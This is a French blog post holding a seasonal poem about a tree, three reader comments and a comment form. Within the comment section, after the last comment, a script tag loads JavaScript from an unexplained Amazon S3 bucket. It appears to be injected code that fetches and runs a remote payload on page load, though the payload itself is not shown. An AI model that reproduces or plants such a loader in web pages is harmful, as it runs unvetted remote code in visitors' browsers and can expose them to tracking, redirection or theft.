• Au pied de mon arbre

    Au pied de mon arbre 

    Au pied de mon arbre, je visais heureux,
    Chantait Georges Brassens.
    Arbre de vie,
    Qui cache le soleil trop chaud.
    Arbre desséché durant l’été,
    Sous une canicule brulante ;
    Ses feuilles pleurent,
    En s’affalant sur la pelouse.
    Trop d’eau pour lui en automne,
    Avec des vents qui soufflent le reste des feuilles
    Trop vite jaunies par le manque d’eau.
    Que sera cet hiver qui accourt à grand pas ?

    Quelque soit la saison,
    Un vent murmure sa chanson dans ses branches,
    Chanson nouvelle au printemps,
    Où tout renait en prévision des fleurs,
    Chanson assoiffée en été,
    Un léger murmure à peine audible,
    Chanson pluvieuse en automne,
    Qui lui arrache les feuilles,
    Qui s’envolent au gré du vent
    Semant mille couleurs
    Qui dansent sur les pelouses,
    Tant qu’elles ne seront pas ramassées.

    Chanson monotone en hiver
    Quand les brouillards surprennent le matin,
    Que la lune joue à cache-cache
    Quand le vent du nord,
    Cingle nos visages.
    L’arbre dénudé a changé de visage,
    Squelette blanchi par la chaux ou le neige ;
    Simple carcasse à travers les brumes,
    Quand la lueur du jour levant,
    Dessine ses formes squelettiques.
    Mon regard attendri se pose sur lui.

    Toi, mon arbre, si beau dans la belle saison,
    Je ne peux te réchauffer.
    Dame nature, que tu es dure envers lui !
    Il servait d’abri aux oiseaux,
    Qui avaient construits leur nid,
    Pour qu’éclosent des petits œufs,
    Qui donnent la vie.
    Quand la chaleur du soleil va-t-elle revenir,
    Pour faire éclater de nouveau bourgeons,
    Et redonner vie à ses branches défuntes ?
    Ce n’est pas un rêve.
    La nature te redonnera vie.

    Toi, mon arbre.
    L’hiver consolide ton tronc,
    Pour le rendre plus solide.
    Ainsi, se déroulent les années ;
    Tu retrouveras ta grandeur,
    Avec le roulement des saisons.
    Des maux d’hiver sont indispensables,
    Pour redorer ton blason,
    Quand chanteront les saisons,
    Quand piailleront les oiseaux,
    Quand reviendront les hirondelles,
    Quand roucouleront les pigeons.
    (05/12/2019)

     

     

     


  • Commentaires

    3
    Samedi 7 Décembre 2019 à 06:21
    Séverine

    Les arbres ont pris leurs habits de tristesse, comme je déteste cette période où toute la nature est dépouillée, sans parler du froid... Allez hop, tête en avant vers les beaux jours qui reviendront...

    2
    Samedi 7 Décembre 2019 à 03:39
    colettedc

    Tout à fait magnifique, Daniel !

    Bravo ! Bisous♥

    1
    Evy
    Vendredi 6 Décembre 2019 à 16:30

    Bien beau bonne soirée bis

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :